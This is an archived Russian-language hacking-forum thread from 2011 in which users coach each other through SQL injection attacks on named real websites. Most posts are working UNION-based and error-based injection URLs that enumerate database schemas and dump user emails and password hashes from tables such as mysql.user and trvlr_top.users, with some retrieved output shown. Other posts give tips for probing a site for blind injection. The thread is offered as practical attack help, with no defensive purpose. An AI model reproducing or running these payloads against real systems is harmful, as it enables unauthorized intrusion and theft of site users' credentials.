ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.04.2011, 13:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
ухты, спасибо, а вот ещо вопрос,
столбцы подобраны правильно
http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,group_concat%28column_name%29,3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,18,19,20,21,22,23+ from+information_schema.columns+where+table_name=0 x75736572--
а вот например вывести пароли из узер неполучается, почему?
http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,Password,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,18,19,20,21,22,23+from+user--
|
|
|
|
25.04.2011, 13:56
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
qaz
from mysql.user
|
|
|
25.04.2011, 14:02
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от Cennarios
Cennarios said:
Ведь error-based имеет свои нюансы и к примеру load_file провести через посредством этой методики нельзя
еще как можно
|
|
|
|
25.04.2011, 14:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
735
Репутация:
0
|
|
Есть сайт. Главная:
http://cls.tgl.ru/index.php?option=com_frontpage&Itemid=1
Подскажите как можно нарыть уязвимости, на SQL Injection на ощупь не получаетс:
http://cls.tgl.ru/index.php?option=com_frontpage&Itemid=1' -ошибки не выдает
http://cls.tgl.ru/index.php?option=com_frontpage&Itemid=2-1 - выкидывает на другую страницу.
Если это фильтрация то каким способом можно ее обойти?
p.s. Извините за возможно глупый вопрос.
|
|
|
|
25.04.2011, 14:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от Konqi
Konqi said:
qaz
from mysql.user
так тоже ничего не выводит
|
|
|
|
25.04.2011, 14:08
|
|
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582
Репутация:
394
|
|
Сообщение от qaz
qaz said:
так тоже ничего не выводит
http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,group_concat(user,0x3a,password), 3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,2 2+from+mysql.user--
|
|
|
|
25.04.2011, 15:57
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от qaz
qaz said:
так тоже ничего не выводит
Код HTML:
HTML:
http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,group_concat(concat_ws(0x2e,table_schema,table_name)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,18,19,20,21,22,23+from+information_schema.tables+where+table_name+like+0x257573657225--+
Результат:
Код HTML:
HTML:
nw.phpbb_users,nw_mir.users,trvlr_forum.phpbb3users,trvlr_forum.phpbb_users,trvlr_top.users
Выбираешь нужную таблицу. Для примера trvlr_top.users
1) Узнаем колонки
Запрос:
Код HTML:
HTML:
http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,18,19,20,21,22,23+from+information_schema.columns+where+table_name=0x7573657273+AND+table_schema=0x7472766C725F746F70--+
Результат:
Код HTML:
HTML:
memberid,sitename,url,email,description,password,clicksin,clicksout,hits,date,passreset,passreset2,rank,id_kat,hosts,knopka,mail,open,all,status,users,ocenka,checker,login,chastota,fio,open_link,content,title,server,desc,keyword,time,chk_date,chk_result,is_new,is_violator,days_left,mail_sent,chk_attempts
2) Выводим юзеров
Запросы:
Код HTML:
HTML:
http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,group_concat(concat_ws(0x3a,memberid,email,password)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,18,19,20,21,22,23+from+trvlr_top.users+where+memberid+between+1+and+20--+
Код HTML:
HTML:
http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,group_concat(concat_ws(0x3a,memberid,email,password)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,18,19,20,21,22,23+from+trvlr_top.users+where+memberid+between+21+and+40--+
и т.д.
|
|
|
|
25.04.2011, 17:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от cat1vo
cat1vo said:
SQL error: Duplicate entry '5.1.49-3-log1' for key 'group_key'
А можно поинтерисоватся,
http://www.photoclub.com.ua/rubric/?id=34'+or+(select+count(*)+from+(select+1+union+s elect+2+union+select+3)x+group+by+concat(version() ,floor(rand(0)*2)))--+'
я такой запрос вижу в первый раз, может мно хтото обьяснить што ето,
особенно интерисует
+or+(select+count(*)+from+(select+1+union+s elect+2+union+select+3)x
и
floor(rand(0)*2))
|
|
|
|
25.04.2011, 17:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
173402
Репутация:
37
|
|
Сообщение от Nightmarе
Nightmarе said:
Itemid=1 страница 1.
Itemid=2-1 страница 2.
логично кажется.... тут SQL нет. ибо тогда в любой новости при смене ID в параметре новость бы менялась, но это не значит что это SQL
Проверяем SQL так:
Itemid=1+or+1=1
Itemid=1+or+1=2
Так страницы должны меняться. не меняются, значит запрос обрамлён в кавычки, пробуем так:
Itemid=1'+or+1=1+--+1
Itemid=1'+or+1=2+--+1
Не меняются страницы, значит SQL нету.
Здесь есть Blind
http://cls.tgl.ru/index.php?no_html=1&option=com_rss&feed=RSS2.0
http://cls.tgl.ru/index.php?Itemid=106&option=com_content&task=blogs ection&id=3
http://cls.tgl.ru/index.php?option=com_rss&feed=RSS0.91&no_html=1
|
|
|
|
25.04.2011, 17:53
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от qaz
qaz said:
я такой запрос вижу в первый раз, может мно хтото обьяснить што ето
/showpost.php?p=407227&postcount=3
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
